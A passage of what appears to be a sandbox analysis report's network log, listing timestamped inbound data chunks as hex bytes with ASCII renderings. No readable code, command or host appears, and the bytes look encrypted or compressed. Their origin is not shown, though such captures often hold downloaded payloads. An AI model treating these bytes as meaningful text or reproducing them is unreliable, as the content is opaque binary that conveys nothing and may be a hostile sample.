cb 83 62 ba 47 ed Data Ascii: t@)65f4fNI_81{~!/)1"2-QIzi'i6K*[3,w'sOmZ@E(CI(Ir;QKupyXvhdfZrSi(=]2MnO"MtbOL.?D8lJ6Qs4FK+!+" ~x0>bG
2022-11-07 22:49:10 UTC	10585	IN	Data Raw: a7 ca 4d 03 dc cd 2e e9 69 2f f7 96 ec 6f d5 11 66 c0 bf 16 d4 57 19 b1 35 83 63 ee c9 34 d7 93 e6 fb 1f 0b a6 a4 8e 44 71 e6 f3 56 2b 39 f3 ff 25 df 34 28 f4 b4 d7 17 82 e1 85 b7 31 37 83 58 be 6a 04 e2 4f f2 83 93 ca b1 c7 d3 a2 b0 a4 6f cb dd a6 1e 22 75 93 47 e7 ed 6f 35 49 c7 a3 f9 34 8d 30 09 ef 33 5b f8 76 b6 67 c9 17 2f e8 31 55 c6 ec d9 21 3f 6c ed 0a 52 c0 c9 17 57 f4 5a e7 be e7 7e 1b b2 40 88 0d 0c d1 70 82 69 f7 f8 52 09 0f ec 7f 8f 45 42 8f 10 46 fe 41 cf 5a bb 0a c0 90 f9 5f 0a b8 8b 09 9a 3f 85 2d 47 e1 cc 42 ae 8c 52 4b 97 a6 86 b2 a7 99 5b bc ef df 1f f6 40 8f 38 cd ab 71 4c 49 33 25 9b 37 6e 5e 47 f2 3d 9b 04 df 1e 6c b6 9a 12 95 c0 3d 97 a9 fc 76 13 63 38 20 d9 9d 6a 7d 94 e4 7c 60 33 67 83 2d 1a 1f 39 dc e7 02 67 ea 0a 82 ee 7f 36 bf Data Ascii: M.i/ofW5c4DqV+9%4(17XjOo"uGo5I403[vg/1U!?lRWZ~@piREBFAZ_?-GBRK[@8qLI3%7n^G=l=vc8 j}\|`3g-9g6
2022-11-07 22:49:10 UTC	10601	IN	Data Raw: 19 53 ad 1b 7d 14 f1 85 ed 80 f4 f4 50 ac d2 69 13 c6 1f 37 99 b7 1a 31 04 93 c3 53 3b 1c e7 94 e4 90 75 a7 3d 36 8b d2 ef 14 13 17 21 87 2d 7c 10 48 80 15 dc 0d 18 c0 63 06 c7 fe 37 e9 af 48 aa 3b f3 0c 91 17 df 72 d0 6c 0b 6e 6f bc 43 6f 41 e0 39 e3 7b 49 97 a3 7e 41 8c 8d f3 90 3c 10 de f9 9f 6d e8 15 23 30 58 6f 3e 5e 11 e6 fe bf 96 e0 9e 42 58 7c 6d 04 f5 d5 ee 46 d6 6f 2d eb 80 f8 cd 65 6c 30 74 6c e5 b9 be cb a3 d0 45 ea 39 7f de 89 69 77 2a cb 22 ad d5 23 7c 87 e3 cd 77 03 c7 10 d0 d8 ae 15 fb ef 4b 02 07 46 7a 71 e3 d1 87 d1 d7 df 4e ac 22 65 21 b9 73 45 d3 62 40 54 67 13 88 79 76 ad e5 2f f3 fa b2 d5 ae 3e bf 80 bf f4 ed b8 ef 04 29 11 3f c2 47 ab 7e 67 98 c4 06 5c 09 95 b1 ff b9 9d bd 45 bf 76 04 e9 f4 6f 35 dc 28 05 91 71 30 bd 8c bb bb 24 1a Data Ascii: S}Pi71S;u=6!-\|Hc7H;rlnoCoA9{I~A<m#0Xo>^BX\|mFo-el0tlE9iw*"#\|wKFzqN"e!sEb@Tgyv/>)?G~g\Evo5(q0$
2022-11-07 22:49:10 UTC	10617	IN	Data Raw: ec af db 78 74 06 d8 8f 0e 00 1c e5 5b ba 41 c0 64 08 10 8f 93 9f 8b c7 24 74 d2 9d dc 72 40 2c c5 bd 10 51 fd 14 81 7e a7 7c b7 29 d6 66 d4 43 78 b3 6b aa 7f a5 6b ea f1 cd 57 1c 36 36 2e 1e 91 e0 a1 87 50 4c ce f9 4c 0c 94 42 6b f6 a9 44 51 5a 66 fc f9 b1 d5 8b b7 52 c7 88 e5 e9 65 9b b7 56 e4 ba 0d 23 9e 0d 55 b1 78 a5 6e 4c cc 47 e8 5c e7 ad d9 b5 73 39 2b 73 53 2b 2a c5 1d 5f 0a 3b 87 4f 78 35 13 1b 60 5b f6 8f b9 ff 09 72 a8 27 61 86 78 ca 39 9c db 4a 19 b9 b1 17 a7 64 03 1e cc c2 86 8e 3a 2e 22 ec 82 89 19 6f 53 7a 55 65 65 3d e8 58 29 e6 ad 17 27 9e e0 3a ae 93 3f 9d d0 da 01 31 13 50 75 05 ac 0f 5b 78 7a 13 13 80 56 68 cb ea 78 14 a4 cb ed e5 52 d1 61 66 3d 5c 35 b7 98 89 72 3d c3 6a f9 86 9f a7 a2 41 5a a2 30 17 fd 70 8f 4c da 10 39 6a b1 53 8b Data Ascii: xt[Ad$tr@,Q~\|)fCxkkW66.PLLBkDQZfReV#UxnLG\s9+sS+*_;Ox5`[r'ax9Jd:."oSzUee=X)':?1Pu[xzVhxRaf=\5r=jAZ0pL9jS
2022-11-07 22:49:10 UTC	10633	IN	Data Raw: 4e f5 01 ed 6d 45 ac df 47 66 5b dc 29 b7 76 f5 97 8b da 6a c0 bd c4 db e1 62 4b 27 3a bc 47 34 f7 25 0d 59 71 fb 51 ab 25 0d 4d 53 a1 24 26 5c 24 76 aa de 2b e8 60 5c 5e 00 93 3d 8d 72 01 c9 bb 57 0b e5 21 ae cb de 8f 07 99 2f 44 e0 2a b7 5e 0b 5a 76 5c 1a f6 78 a9 32 a7 27 b0 70 4a 04 6c ed 95 46 74 13 b1 a9 0f 7c 48 23 46 c5 c4 6d bc 78 0e 0a 0a 33 f1 f2 7b 4e 59 c0 6b 80 87 93 81 2e dc f8 b2 43 71 a7 4e f6 3d b5 97 f7 55 f3 3a 2c d1 18 3e f2 9f 35 22 c6 8b 31 23 99 37 e8 61 08 5b c3 ce 05 54 f5 1e 1a a3 33 2a 4f 1a 4b b6 ef 5e b8 02 b0 6a f3 07 3b 2c e3 da 03 44 43 7f a3 b6 be a8 e7 3e 30 9c 82 6e 63 94 fc b5 91 03 77 64 3a 1f b7 f4 fc 35 9d bd 6a b2 85 71 24 30 78 80 13 15 05 2e f2 a9 82 c7 12 74 2d c2 d4 8e ef 8d f9 df 01 6e d8 39 03 e1 2e a0 88 1f Data Ascii: NmEGf[)vjbK':G4%YqQ%MS$&\$v+`\^=rW!/D^Zv\x2'pJlFt\|H#Fmx3{NYk.CqN=U:,>5"1#7a[T3OK^j;,DC>0ncwd:5jq$0x.t-n9.
2022-11-07 22:49:10 UTC	10649	IN	Data Raw: d5 48 fc 54 51 d5 d4 e5 c8 d9 0e 78 91 4e 54 74 cf da f2 d9 d3 2b 47 2a c7 8c 5b 21 7f c9 ed 40 ae 2e 2e 4e 04 c7 7b 23 72 30 d9 c7 af 22 f1 9c 8b 43 36 20 d5 4f c5 9f 05 64 15 16 6e bf 09 34 8f 2e dd 0c 08 bf d0 8a 02 7c 4e 48 94 81 1b be e5 26 1a 1f b8 93 4a 95 d4 97 9c 1e 16 b6 cd b2 24 ab 7b 8d 16 63 a5 5d 23 6e 31 cd 4a b5 6f a8 f1 8a 52 ea 88 b7 ed e9 e1 0e a2 19 00 90 8f 80 cc 60 c7 fe 8c d3 4c b5 22 cf d0 41 5f 65 fb f8 e2 53 64 ba 7e 75 60 40 f3 b0 c8 08 69 e2 c8 e8 04 78 89 13 fc 23 07 3e 07 3e fa 91 9f f1 c4 fb 0b f4 e2 59 c1 94 ef cf db b2 88 5d 42 34 c3 cb cd cc 88 bb 21 a8 e9 9f fa 71 ec a0 b5 59 fe 69 4d f3 38 0f 0e aa de cc d2 68 19 99 6d 41 df 2e 0f 0c df 0e e4 b6 1b 9e dd 6f 20 0f d2 52 65 fb 4a 88 91 ba cf c9 7c 97 79 2a be a9 58 bd e1 Data Ascii: HTQxNTt+G[!@..N{#r0"C6 Odn4.\|NH&J${c]#n1JoR`L"A_eSd~u`@ix#>>Y]B4!qYiM8hmA.o ReJ\|yX
2022-11-07 22:49:10 UTC	10665	IN	Data Raw: 1e 92 08 86 b2 8f 74 32 77 73 1d 1a 4f b2 ef f7 e1 1f 4e c2 26 02 96 60 43 66 da 84 ba 72 4a 7d 4a 92 33 18 1f 37 70 ea 93 be b8 8e 91 38 5c 19 3c 03 14 91 38 56 96 aa 8d da 19 4b d1 27 6b 24 c6 56 f6 cf 2a 64 b3 fd 14 f2 30 81 c4 34 8c b5 b3 75 ce ab 0d 8e 7d 5c eb d1 f6 e5 10 c3 40 bb d5 6f 50 d9 15 b2 f8 c3 d8 68 ce 19 17 06 cc bf 98 d5 e8 13 91 fa b1 e1 fb d1 66 01 36 a1 b5 a2 21 44 16 19 0a 6f 86 b9 a3 f2 b2 8b ca 91 ac 65 3d c1 cb 10 2d 87 12 26 c1 03 ad d1 3b 80 a3 cf ea bd 9b 70 49 65 77 4d ea e5 6c 40 fe e1 0b 00 97 7b 8b 5f 37 b3 39 c8 c6 8b 6d 98 a9 25 4f fe c2 c4 ff 0e ec 1b bf b3 48 26 4a f8 92 bf 16 46 7e ef 3e 0d c4 fa 00 d1 56 f5 26 21 0e 5c 22 f0 f4 1c aa 08 6d 88 10 91 df ef 25 4d a9 26 63 e5 5a dd 73 72 05 8e 1a d9 4a 35 a8 ed fb 7f 21 Data Ascii: t2wsON&`CfrJ}J37p8\<8VK'k$V*d04u}\@oPhf6!Doe=-&;pIewMl@{_79m%OH&JF~>V&!\"m%M&cZsrJ5!
2022-11-07 22:49:10 UTC	10681	IN	Data Raw: 75 06 dc 4a 13 83 33 b3 98 64 bd 2b ab 13 6d 82 3d c3 a9 f7 f0 82 21 27 68 5e b4 5f a3 e7 a5 f2 cb 60 87 ee cf 54 d0 4d 96 c3 9c d1 01 3f 16 4e b1 4b 19 46 16 a6 17 84 87 36 58 57 8f eb b0 e4 6a 35 e1 36 9f 42 f2 b4 69 aa 65 5a 9b 35 b9 0c 6e 9b b2 7a e7 97 3c ee 55 cf b2 d1 8f 59 b9 aa 4d e6 2f 39 ab 1c 5f 9e 05 cd a6 14 03 9b ed 6b 28 22 32 2d ad a9 d0 64 fb 34 b1 e7 d5 e3 cb 11 c9 ec eb 8a a9 b1 6d 7f cf 7b 60 51 cd 79 ae 60 92 83 7b 97 0a 71 7b a1 b3 7e 73 c5 59 72 00 d0 95 6f 5e 1a fb aa c2 dd 99 a9 6e 63 bd 94 8d a7 ab 35 af 9b 3c a5 f8 9b 22 84 a5 84 33 9c 3f 8f d5 15 4f 51 25 fd 6b d3 57 02 77 a0 5a 7f c5 7a e0 46 fe 90 d7 f3 9d c8 35 37 0e 6a 0d 1f cb c3 12 2c 83 63 2f 30 06 80 f0 51 8a 41 50 a2 ca c0 1f 0e a0 79 c6 68 c2 98 a4 d3 ad 60 65 00 01 Data Ascii: uJ3d+m=!'h^_`TM?NKF6XWj56BieZ5nz<UYM/9_k("2-d4m{`Qy`{q{~sYro^nc5<"3?OQ%kWwZzF57j,c/0QAPyh`e
2022-11-07 22:49:10 UTC	10697	IN	Data Raw: 43 cf 65 e0 17 b0 67 83 26 a5 43 5f f6 b9 de 79 08 4d 31 7c fb 1d 9a e5 9a 7e 56 ce fa 87 69 4e da 50 45 1e cf d6 09 9e d7 ef a2 af 3f f8 c3 e9 b3 25 50 09 30 09 f5 53 c6 ed a5 d3 9a 8e 08 0e e7 30 e4 c4 43 d4 58 1e 10 ef a7 8d 58 c6 28 66 96 71 0b a8 a3 b3 70 99 c5 6a 84 f6 e7 90 dc 58 54 27 2d 12 7d d8 3a 2c ca bd 7a 94 7e 03 54 a8 54 5c 70 73 66 0e a1 a8 53 b2 5b 16 e2 86 8f e2 08 67 8d af 2b 1d 27 f1 29 2a 3d 3b 58 c1 91 c3 b7 66 34 6b 99 f7 8e 26 03 9e 1a f3 9b ee 9c 73 1b e9 bb d7 75 2d 1c ba 70 f1 2c 83 2e 39 24 e2 64 e6 c3 45 29 dc 2e 81 0d 67 76 78 2f 40 95 f3 b2 da f4 ce 9c 91 2f 53 ed 48 61 e7 d8 fd a2 b1 c6 bc 8a c3 c0 93 3a 4d e9 05 bb 83 9d 64 2e fa 97 2c b9 4e 18 fe 5e 8a 87 21 9f 21 51 1a 4f 5d 02 7a 0c 3c b4 af 56 f1 64 a4 35 42 c7 ca a0 Data Ascii: Ceg&C_yM1\|~ViNPE?%P0S0CXX(fqpjXT'-}:,z~TT\psfS[g+')*=;Xf4k&su-p,.9$dE).gvx/@/SHa:Md.,N^!!QO]z<Vd5B
2022-11-07 22:49:10 UTC	10713	IN	Data Raw: e6 ad 88 68 f2 0e a1 ea 64 c8 74 6b c4 98 e8 e6 36 a7 d6 a0 85 b6 c1 46 17 34 a5 50 31 e5 c8 b3 17 00 03 53 f7 8a 4e 88 0b 1b 71 d1 06 01 bf 7d 0e d5 21 4c 24 ae c8 2b 93 cd 58 5e 37 11 76 4e 04 64 95 5f 5e e2 4e 75 e4 8d b4 aa e4 f9 26 46 d9 ed c2 a1 68 e9 a6 a6 e0 64 5f 5a ad f1 fe 26 5f 54 5d a1 04 71 0b d4 49 f1 ba 1a 1e fa da 9b ef 7d 29 43 57 81 97 2c 93 1d d1 68 6f d7 6e 94 74 62 35 d2 30 90 c9 bb 0c e8 7a 5d 8b 08 4d a5 52 a8 e6 62 60 31 e2 d4 fe 8b 97 7c 3d 1e c0 e3 84 23 eb a5 71 5f 7c 89 ba ff 5a 33 e2 ce 38 25 6e 43 9e 32 4c 2d b1 80 95 ea 13 bc 50 b6 fc c2 b8 81 8f db 37 5c 10 6f 7c 19 dd fe b3 44 a8 69 1e 0b a9 2d f6 2a e2 2d 8b e2 ec 11 24 d9 24 01 f8 8b 91 ca 04 70 5c d5 5d 64 5b 06 60 43 0d c6 d3 44 42 27 c7 3d e9 81 8e fd 92 2a a4 f8 7b Data Ascii: hdtk6F4P1SNq}!L$+X^7vNd_^Nu&Fhd_Z&_T]qI})CW,hontb50z]MRb`1\|=#q_\|Z38%nC2L-P7\o\|Di--$$p\]d[`CDB'={
2022-11-07 22:49:10 UTC	10729	IN	Data Raw: 7e f4 80 93 1d 6c f8 0b e2 3a c3 d1 5a 54 b5 54 e0 f8 f8 a1 82 8b f8 0d 40 f6 1b 11 60 41 3a 2c 3a 84 99 85 bd 73 c9 ca 84 72 43 60 d8 2e ea 9b 98 a3 cb 2d e2 4e d8 09 2e c1 67 af e1 64 d4 df 06 6e 03 fe 4e 00 8a 57 1c 45 7e e7 05 2a 7f 83 d3 b8 a7 ae 7e 5e 54 ac f3 90 8c 7f 35 99 31 2b 75 a0 f1 35 8f d4 bf 1c ce 52 f6 58 5f 73 e4 a8 f9 4c 0e b4 16 e0 ec 5f 38 35 cb a3 2f 8a 77 bd 24 73 0a f3 a3 07 c3 8a c2 1d 67 1f e2 64 41 d2 70 df c9 63 be a7 ea 61 6a 82 4c 98 ef df 38 71 b8 7a 1a 6b eb d0 51 87 a1 4a 32 a7 7d e4 6e f6 9a 21 b4 ca 9e 84 62 be d1 2a f0 64 dd 8b fb 3e e2 3a 4f c4 5f 1d 54 04 3f 4f 4b c5 de 38 76 60 25 be 68 01 8a 2e 30 ab cd e4 84 76 60 46 32 27 10 cf 7f c2 71 66 e6 38 75 7e b6 7d e3 9b bd d3 a9 31 b9 19 04 dd f7 b3 e3 e8 94 ee c5 f5 ab Data Ascii: ~l:ZTT@`A:,:srC`.-N.gdnNWE~~^T51+u5RX_sL_85/w$sgdApcajL8qzkQJ2}n!bd>:O_T?OK8v`%h.0v`F2'qf8u~}1
2022-11-07 22:49:10 UTC	10745	IN	Data Raw: 58 70 ed 89 aa 4a 7f d8 0f e1 35 59 9e 8c 35 fc d8 e9 ef 63 df ad 79 e0 3f 55 b2 a1 13 50 d9 5a a8 00 2b 4f b1 31 b7 86 a6 75 b8 01 cd 9c 63 c0 19 48 a2 02 6c 87 cc 53 64 48 ac ee 84 37 dd d4 06 41 17 02 5d 4c 7f 5e 62 d7 1e b1 09 97 80 39 7d 47 a9 7d 9e 45 2e c7 f9 b7 b5 51 11 08 be 63 14 f7 79 40 9e f4 e0 95 25 df 13 24 f2 39 1a b7 43 f5 e0 b3 8d 03 72 05 12 c0 a0 46 8d ae 12 f3 23 09 c2 4d d6 f6 79 62 f6 69 4c b6 56 e4 84 8a 03 d4 69 ff 23 d4 8d 96 ce 87 95 2d b5 29 dc c0 bd ad ab c1 cb f1 73 b7 39 0a 22 cd 14 34 b5 2a d2 bd 1b 18 bf 3a 72 21 38 37 3a b6 4f b2 62 ec 94 0c 14 58 b8 8e d5 8e 05 48 83 7d 0f 48 7d 06 ea 4d f6 f2 0f 6e c6 88 df fd 0e fd e3 58 df 29 e2 16 f7 05 bc b1 72 c5 76 1a a1 1c ec 60 92 f4 f7 80 9b 75 a2 f1 2c 69 76 47 61 c7 7f 30 d6 Data Ascii: XpJ5Y5cy?UPZ+O1ucHlSdH7A]L^b9}G}E.Qcy@%$9CrF#MybiLVi#-)s9"4*:r!87:ObXH}H}MnX)rv`u,ivGa0
2022-11-07 22:49:10 UTC	10761	IN	Data Raw: 0f 87 1d 85 de 20 88 5b 89 5e 72 10 a7 5a 1e 14 f8 2f 9a dd 21 da 98 79 4a df ba bf 59 1f d6 ad b7 44 58 d8 27 e8 2e 4e bd c4 15 fd 70 94 91 68 33 35 82 66 79 ac 4e 88 ab 0f 29 cf b3 44 62 93 c0 e2 9d 5b 6f 5d db 30 eb 25 6c 3e 85 f7 0f 21 ea 0b b1 58 e9 01 1a 18 f0 81 31 86 b4 aa 34 ce f5 64 ab 81 b1 1c 45 73 63 af 6a 8d a9 c4 68 36 a2 4d 4b ca 62 1b af 87 7c d7 aa d2 a5 75 5a 37 de d2 03 0b 30 19 43 94 46 55 ff e8 f2 88 cd 81 21 8b 2d f9 06 23 68 33 6c c6 81 70 b6 c1 6c 38 bd 3d c6 e8 52 92 4b 4b b1 2c 69 e7 08 8b 4b 17 5c 29 0a e0 4b 4d 92 e3 87 5b 6d 9e 95 95 52 5a 47 82 77 06 ab 8e cd 2b 11 be 67 fd 46 93 e1 e7 23 9d 3a ec e2 16 7a 68 bc 5b 24 a0 3d 3f 54 21 a0 22 97 df 7b 59 97 b4 79 5d 0a 53 3a 24 69 5a 43 26 88 60 b6 8d 37 6f eb 26 cb 44 f4 2c 35 Data Ascii: [^rZ/!yJYDX'.Nph35fyN)Db[o]0%l>!X14dEscjh6MKb\|uZ70CFU!-#h3lpl8=RKK,iK\)KM[mRZGw+gF#:zh[$=?T!"{Yy]S:$iZC&`7o&D,5
2022-11-07 22:49:10 UTC	10777	IN	Data Raw: c5 48 87 a7 84 0c af 31 4e 77 05 dd 3c ba 85 c6 04 60 a9 a3 c2 10 e8 77 2c f8 5f b3 c6 c1 5c 25 b6 19 fa d0 bf 74 01 71 9a ed f7 cc 45 0b 14 72 39 f2 84 18 eb 74 ea 49 81 64 cb 12 4f c2 47 4b 8d 91 30 13 2c 6f 5e 5f 15 34 3e 4d 69 f1 d3 61 1e fa b5 47 4b e9 c3 aa 45 ce 6d 9c 56 77 3b a8 86 4b 9d c7 63 9a a0 3f ab b8 af 17 c8 79 07 c2 15 3f 56 df 51 83 e5 64 73 db 57 01 92 e7 a1 20 80 48 a4 b7 88 3e a9 cf 0c 05 75 88 38 eb 3c d0 a3 f4 12 20 2a 13 16 7e b1 c8 eb ed 75 16 ad 89 b4 ab f9 e0 52 05 97 69 61 70 a1 82 f9 c9 63 82 dd 0a b4 74 4e 08 25 29 95 20 21 bd 17 1e d7 fb 21 64 6c 58 3c 32 65 42 46 f2 46 44 dd 37 5c 8c 3e 31 95 1b 31 03 9e 38 c1 29 15 54 8e 5b a6 db cc 0e 9c d2 ce 5e 09 9b 6b 6d 5e d8 5c 66 53 88 b7 a0 ab e9 ef 13 40 9c 87 98 bb cf 53 9b 2a Data Ascii: H1Nw<`w,_\%tqEr9tIdOGK0,o^_4>MiaGKEmVw;Kc?y?VQdsW H>u8< ~uRiapctN%) !!dlX<2eBFFD7\>118)T[^km^\fS@S
2022-11-07 22:49:10 UTC	10793	IN	Data Raw: e1 37 77 95 ce cd 77 2a 8c c1 ea 04 4d 68 2d 26 31 6b f2 67 a3 83 e6 21 58 49 b0 61 8a 70 22 4a 84 d0 56 e5 c0 96 93 33 e1 57 2b 9a b6 2e 3d 12 83 a5 62 4b 53 6b e2 7d ac ab 0e 95 a9 f5 4e 24 aa aa f7 27 3c 01 f2 aa 1e 1d 05 14 2d 60 52 ec 26 1d b9 3e d6 34 66 aa cb 6e 47 f7 7c a3 ee 51 fa 80 ae 86 01 74 5e 72 60 0a 0f f2 2a 42 40 be 15 d6 ea 0b fc 9a 72 46 2f c3 c8 90 15 b8 9d 6b 2d 50 69 69 bd f6 ae b1 53 ab ee 9c 2a 81 35 1e 13 a1 e1 1f 32 f4 4f 52 10 05 bf 2d 87 d1 93 ec 4a ec 47 b7 69 6f 93 5a 5e 17 b8 df d0 36 1f 1a d7 84 cd 2d c2 2f 0b a9 2a 1d 69 ed c4 29 3a 63 06 40 bf fa 34 d2 15 02 3b cc cc b3 ed b9 e7 4e c5 56 91 1e 0b eb cf 33 ae 3a be 8d b0 e8 80 8a 25 ad 0d e8 3e d0 d1 5d 22 97 47 fd e1 0a 9f 62 88 c6 98 52 cd 83 ad 75 5e 57 00 63 d5 89 0d Data Ascii: 7wwMh-&1kg!XIap"JV3W+.=bKSk}N$'<-`R&>4fnG\|Qt^r`B@rF/k-PiiS52OR-JGioZ^6-/i):c@4;NV3:%>]"GbRu^Wc
2022-11-07 22:49:10 UTC	10809	IN	Data Raw: e1 c8 82 e5 c2 74 f4 4a 20 26 24 03 0a ce bb 10 09 2a 21 73 72 e5 f8 1d eb 41 15 74 4c e4 0d 80 2f fe 62 ba 80 1b d2 f1 b9 23 d7 bd d9 14 36 63 62 ae 62 17 c3 fb ca ee 70 96 99 39 a7 5d 27 45 a2 1b 9e a4 f2 1b 14 11 47 eb d9 73 4c fe 8a 29 cd e7 ee ed 7b 55 9f 5f cf e2 2c 3d 41 9c 83 a4 3b 61 5b 88 a3 22 39 56 f2 05 ef b8 2c 17 5f 69 0c d6 99 d7 23 f0 22 0d 49 f7 43 41 44 b1 33 63 80 d4 93 b5 5b 77 9d 16 c1 f7 6d 8f 2b a3 8e 4d a9 6c 32 98 e7 94 64 f5 d8 ba a4 e9 f0 e5 cf a8 a5 68 29 e0 58 79 39 b5 0c 58 e3 c7 c2 fa 8a bd b7 fe 4a 83 bc 47 e0 4c 22 17 61 6f 4f 70 d4 05 b1 05 63 69 f1 28 2f 95 8e 38 cf 53 3e 6b ef 4f cb 4a cc 07 8c 89 6b fe 9c 34 4a 69 ff 3a 3b 09 64 ed 70 59 ef e7 7f e6 49 ca 2c 6d a6 e0 83 b6 cc 44 74 02 e2 6c d2 76 f5 91 60 c6 0c 7a 19 Data Ascii: tJ &$*!srAtL/b#6cbbp9]'EGsL){U_,=A;a["9V,_i#"ICAD3c[wm+Ml2dh)Xy9XJGL"aoOpci(/8S>kOJk4Ji:;dpYI,mDtlv`z
2022-11-07 22:49:10 UTC	10825	IN	Data Raw: 94 16 48 66 3e 21 1e ba fb fb ba a1 b8 27 3a 57 17 fa 69 01 dd 6f 69 4c d9 b8 36 9c ac a6 32 cb 5e 64 ea 2f 52 38 d0 2e a0 be 59 68 53 ca 16 9d 33 63 e7 1f 72 c1 80 38 cd d4 e7 c7 ab a2 6b dd 16 d8 76 d9 5b 87 0b 7b f0 35 b7 bf 3c b0 49 79 43 0d ed dc ff da 1c 68 4a f9 5d 5e 7d 5e 83 1f 0a 04 04 f3 2c 0f aa cf ca fe c5 c4 0b 62 97 c2 2f 96 d3 e8 1b 02 97 61 a1 96 ab 1a fb e8 20 56 0c ae 34 c4 21 73 a4 a1 23 d6 8c 12 93 01 06 e5 d6 88 58 dd f8 6a fa 10 26 ce e6 12 0c ea 8f f6 1c 8d 02 79 bc de 5c 44 e1 fb 1b 9e 92 8b d2 2d 97 15 a1 56 a1 1c ab c1 4b 78 7b a5 cc 65 df 39 6f b5 99 a2 fe 8c fa 91 fc 40 89 f2 05 a1 56 8a da eb 45 07 e4 eb b7 f8 30 b1 01 83 32 0f 5e 0d f2 70 6c c1 a7 7e e7 a9 c9 a1 95 46 14 4f f7 3a 2e 38 76 97 e1 e6 94 b1 db a2 a5 f5 b6 a5 25 Data Ascii: Hf>!':WioiL62^d/R8.YhS3cr8kv[{5<IyChJ]^}^,b/a V4!s#Xj&y\D-VKx{e9o@VE02^pl~FO:.8v%
2022-11-07 22:49:10 UTC	10841	IN	Data Raw: db 44 73 ce 2b 72 33 bf a0 7f 0a a8 80 98 44 05 d9 67 6e a9 7b e8 eb 7f 47 a0 6a 4b 0a b8 a1 aa aa db dc 98 c6 eb 0a ee 13 1f fd 6f 2a dc 19 b5 54 82 e6 de 08 d3 62 e3 34 4b 4e ec 9d 8c 34 14 d1 87 a9 fc ad 46 eb e0 07 d8 8b 2a ac 9f 19 e4 bc 60 0f 8a 97 8a 18 4c 35 9d 32 b4 76 06 96 24 ae 6b 7d 62 16 eb 7a 9c 01 b1 db 48 f2 9b d4 b9 af 97 82 54 45 39 1f f8 54 f1 00 a8 14 1e 94 af 24 10 ac 29 03 00 b3 d7 54 db 46 29 be ca 9b b2 60 77 71 2d 4c 2e c0 ef 13 42 18 87 9a 33 9e 22 51 d6 d5 7a df b6 ac f1 ea 59 ce 94 88 56 d4 40 4f 23 9f 69 c2 1d b7 cd 3f ac 04 35 07 f9 26 b3 e8 50 0d 5c 1f 6d 17 c2 77 6d 85 2e 72 98 d2 74 11 39 cb 62 aa f5 34 22 2e c0 67 da 98 50 69 6c 97 9d cc 90 c3 31 fd 6f 13 63 84 1b 08 41 63 3c 0b bb 3c 46 28 7e 6b 82 dc ef 0f cb 62 ec 09 Data Ascii: Ds+r3Dgn{GjKoTb4KN4F`L52v$k}bzHTE9T$)TF)`wq-L.B3"QzYV@O#i?5&P\mwm.rt9b4".gPil1ocAc<<F(~kb
2022-11-07 22:49:10 UTC	10857	IN	Data Raw: e5 a6 d3 22 25 35 03 44 75 79 d9 fb 5d 93 de 23 49 6d 39 2f 9a 31 ad f0 f3 e7 43 ee 67 cc b4 7d dc e9 33 19 05 49 3a 78 57 e1 be 00 c9 6b 8d cd 08 45 02 ba 3d 1b 31 fd 85 10 10 14 ec c7 b6 71 80 5b b3 87 15 d1 05 b0 59 6a 30 31 65 ee 86 06 04 54 c5 a2 4f e1 92 5a b9 4f 2a 95 6e 4d b3 64 b3 83 95 9b 02 8c 60 bc 8c be a8 78 b6 0f 75 3b e5 a7 71 70 7d 08 38 d9 7b 11 d7 64 60 99 7f 96 be 1a fe 66 04 cf 66 1b 8b 97 c6 3f 66 e9 4f 76 76 ba 81 6e ec 29 f1 c0 67 87 95 52 b4 12 c6 e4 10 98 d1 3f 6a 47 53 63 2c a0 64 0e 0f 40 e7 92 c9 77 59 c2 36 b8 66 b7 02 ab eb 5f 36 1f db f4 13 7b 2c 1b 93 9c 57 1b 6e 56 16 5e ed 7e 9f e2 b0 92 d3 1c 82 08 0a f8 e8 03 77 ad c5 30 3b c4 9d 39 fd 1f 2f 68 d8 90 18 88 d1 0c 65 da bc f8 eb 7f dc ff 0c c7 48 4d 2d 75 2a 73 f9 70 9c Data Ascii: "%5Duy]#Im9/1Cg}3I:xWkE=1q[Yj01eTOZOnMd`xu;qp}8{d`ff?fOvvn)gR?jGSc,d@wY6f_6{,WnV^~w0;9/heHM-usp
2022-11-07 22:49:10 UTC	10873	IN	Data Raw: 3e 42 82 e8 75 2e f3 95 86 b0 03 ab 37 71 8b 3c ff f8 23 6b ab 44 55 28 0e 76 f8 5c cc e5 93 ce a3 10 a7 f7 00 97 a4 e6 77 fe db 21 60 c4 9b 7f 0b 5d 37 c5 c0 ac 96 07 96 21 7b 31 10 8a db 7a a2 63 8f 5c 1b 15 0f 83 14 52 49 1e 0a 30 4f dd bf ef be 0a fa 3f 82 72 65 40 4b a1 b4 08 3b 80 b4 37 5a 8b 4e 74 14 d1 81 6a e5 89 49 44 0a 47 6e af bc b3 c6 7c 3e 93 d9 a9 98 51 51 0c 6e 55 46 0a 5b 87 40 66 69 c7 bf fd b6 62 ce 00 b1 33 fe 38 ba a1 cc 1c d3 ad 78 be 1b 51 15 f2 47 be 60 53 4e fc 77 7f 7c ce ef e4 5b 3c c2 e4 38 40 38 53 df f0 08 ca e2 9d c3 56 e3 28 e1 97 d4 c0 56 07 bd b2 81 72 9e d7 9e 09 f1 5f 2a 54 06 1b 1e da 50 76 5a 63 1d 44 7f 4b 82 5d 3e 07 38 a7 87 1d d9 1f 9d 09 36 80 af f5 ec 0e 6a 63 f9 e5 4b b0 e9 62 9b cf 01 08 d6 f8 be 48 e7 d0 1e Data Ascii: >Bu.7q<#kDU(v\w!`]7!{1zc\RI0O?re@K;7ZNtjIDGn\|>QQnUF[@fib38xQG`SNw\|[<8@8SV(Vr_*TPvZcDK]>86jcKbH
2022-11-07 22:49:10 UTC	10889	IN	Data Raw: 16 fc 42 ae 32 bd 42 60 51 a6 fc c0 ec e7 81 0a 5e bb 05 e3 69 fc c9 e8 a6 3e c7 ec c6 d7 70 ca e8 37 f3 3c f0 8b 38 6a be bf 2a 1d 66 26 20 c0 32 84 5f fb 47 82 6e 7a b9 4e 73 a2 a6 24 ec 25 41 4c 0b a6 2c 87 e6 26 36 e4 40 83 3c 20 9e f0 f4 05 24 e5 a8 91 08 37 48 2a f6 b5 7f ad 04 35 08 e7 34 ab 43 6d bd f1 3e e6 ff 7b 25 7a cd b7 c2 e4 91 0b 33 89 2a 00 89 7b 95 c8 3a e5 f1 cb 19 aa 29 33 75 a1 f6 07 36 52 49 d7 af 39 05 39 31 22 e0 f9 f0 81 42 eb ad 28 2e c2 00 6b 97 66 fc ee 73 54 91 3c 07 89 12 98 b6 28 b2 33 99 57 ef 02 ca 33 8b 84 da d0 b8 d5 ce 34 84 f3 b3 3e c9 6a e7 20 31 4e fb c2 ec 62 32 97 00 